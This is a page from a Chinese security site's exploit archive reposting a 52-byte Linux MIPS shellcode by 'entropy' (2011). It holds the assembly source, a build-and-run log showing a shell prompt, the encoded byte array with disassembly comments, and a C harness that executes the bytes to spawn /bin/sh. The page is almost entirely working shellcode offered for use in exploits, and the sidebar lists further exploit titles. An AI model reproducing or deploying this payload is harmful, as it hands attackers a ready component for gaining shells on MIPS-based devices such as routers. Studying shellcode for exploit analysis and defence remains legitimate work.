首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux MIPS execve 52 bytes
来源:entropy [at] phiral.net 作者:entropy 发布时间:2011-10-19  
#include <stdio.h>
/*
 
entropy [at] phiral.net
52 byte linux mips shellcode
oh werd
 
entropy@phiral.mips {~/encode/1/2} cat s.s
.section .text
.globl __start
.set noreorder
__start:
    li $a2, 0x666
p:  bltzal $a2, p
    slti $a2, $zero, -1
    addu $sp, $sp, -32
    addu $a0, $ra, 4097
    addu $a0, $a0, -4065
    sw $a0, -24($sp)
    sw $zero, -20($sp)
    addu $a1, $sp, -24
    li $v0, 4011
    syscall 0x40404
sc:
    .byte 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
 
entropy@phiral.mips {~/encode/1/2} as s.s -o s.o
entropy@phiral.mips {~/encode/1/2} ld s.o -o s
entropy@phiral.mips {~/encode/1/2} ./s
$ exit
 
*/
 
char sc[] = {
    "\x24\x06\x06\x66" /* li a2,1638           */
    "\x04\xd0\xff\xff" /* bltzal a2,4100b4 <p> */
    "\x28\x06\xff\xff" /* slti a2,zero,-1      */
    "\x27\xbd\xff\xe0" /* addiu sp,sp,-32      */
    "\x27\xe4\x10\x01" /* addiu a0,ra,4097     */
    "\x24\x84\xf0\x1f" /* addiu a0,a0,-4065    */
    "\xaf\xa4\xff\xe8" /* sw a0,-24(sp)        */
    "\xaf\xa0\xff\xec" /* sw zero,-20(sp)      */
    "\x27\xa5\xff\xe8" /* addiu a1,sp,-24      */
    "\x24\x02\x0f\xab" /* li v0,4011           */
    "\x01\x01\x01\x0c" /* syscall 0x40404      */
    "/bin/sh"          /* sltiu v0,k1,26990    */
                       /* sltiu s3,k1,26624    */
};
 
void
main(void)
{
    void (*s)(void);
    printf("sc size %d\n", sizeof(sc));
    s = sc;
    s();
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MIPS Linux XOR Shellcode Encod
·G-WAN 2.10.6 / 2.10.7 Remote B
·WM Downloader 3.0.0.9 (.pls) F
·Opera <= 11.52 PoC Denial of S
·Apple Safari Webkit libxslt Ar
·Oracle DataDirect Multiple Nat
·Dolphin <= 7.0.7 (member_menu_
·Opera <= 11.52 Stack Overflow
·Dos BP Random Member Widget Pl
·UnrealIRCd 3.2.8.1 Local Confi
·Real Networks Netzip Classic 7
·Opera <= 11.51 Use After Free
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved